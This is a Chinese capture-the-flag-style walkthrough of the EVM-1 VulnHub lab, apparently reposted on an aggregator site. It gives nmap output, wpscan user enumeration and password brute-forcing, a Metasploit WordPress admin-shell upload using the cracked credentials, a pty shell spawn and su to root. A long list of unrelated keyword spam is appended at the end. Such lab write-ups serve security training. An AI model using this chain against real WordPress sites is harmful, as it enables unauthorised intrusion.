Vulhub-EVM1靶机的使用方法
发表于:2025-02-24 作者:千家信息网编辑
千家信息网最后更新 2025年02月24日,一.环境搭建Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。地址h
千家信息网最后更新 2025年02月24日Vulhub-EVM1靶机的使用方法
一.环境搭建
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
地址
https://www.vulnhub.com/entry/evm-1,391/
下载ova镜像文件,vbox导入,设置两张虚拟网卡,分别为NAT模式和仅主机模式(改为默认网卡配置)
ip为192.168.124.156
二.信息搜集:
(端口扫描)
nmap -A 192.168.124.56Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-16 01:45 ESTNmap scan report for localhost (192.168.124.56)Host is up (0.00035s latency).Not shown: 993 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA)| 256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA)|_ 256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519)53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)| dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It works110/tcp open pop3?139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)143/tcp open imap Dovecot imapd|_imap-capabilities: CAPABILITY445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)MAC Address: 00:0C:29:C4:5F:AA (VMware)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:|_clock-skew: mean: 1h49m59s, deviation: 2h63m12s, median: 0s|_nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: , NetBIOS MAC: (unknown)| smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)| Computer name: ubuntu-extermely-vulnerable-m4ch2ine| NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00| Domain name: \x00| FQDN: ubuntu-extermely-vulnerable-m4ch2ine|_ System time: 2019-12-16T01:48:21-05:00| smb-security-mode: | account_used: guest| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb2-security-mode: | 2.02: |_ Message signing enabled but not required| smb2-time: | date: 2019-12-16 01:48:21|_ start_date: N/A
(目录扫描)
开始使用dirb进行目录扫描dirb http://192.168.124.56/
从目录扫描看出他有wordpress所以先试试之前使用过的工具wpscan
wpscan --url http://192.168.124.56/wordpress/ -e u
成功得到账号c0rrupt3d_brain,现在继续破解他的密码
wpscan --url http://192.168.124.56/wordpress/ -e u -P /chen.txt
成功破解出密码24992499
现在开始使用msfconsole 使用模块
unix/webapp/wp_admin_shell_uploadset RhOSTS 192.168.124.56set USERNAME c0rrupt3d_brainset PassWORD 24992499set targeturi /wordpressrun
直接进入他的家目录之后cd root3r 进来之后发现有一个文件似乎是root密码文件
现在进行查看发现似乎是密码,既然已经知道了密码所以接下来进入交互页面如下图:
shellpython -c "import pty;pty.spawn('/bin/bash')"su root
密码输入为:willy26
成功拿到root
密码
漏洞
目录
成功
文件
模式
网卡
镜像
靶场
安全
接下来
主机
信息
原理
命令
地址
工具
模块
环境
知识
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
2018年网络安全周海报
投注app软件开发
爱房网络技术有限公司
软件开发团队组织架构
java存放图片到数据库
mvc数据库增改删查
阿里云数据库名称
阿里云服务器是什么牌子的
查看本地域名服务器的缓存
软件测试前检查数据库
金融软件开发出现的问题
数据库 工作计划编制
智慧农业软件开发
华三杯网络技术大赛比什么
柳州网络安全实战培训老品牌
太空环境测试服务器稳定性
数据库信息导出
江西dell服务器新报价
肇庆连锁软件开发
国际日报网络安全科技馆
数据库单设置精度型
软件开发模型 w模型
固件下载软件开发
ftp 服务器 net
木瓜奇迹连接服务器断开
java 桌面软件开发
老年宝手机网络安全吗
服务器安全狗 小红伞
qt数据库分区
数据库安全性百度百科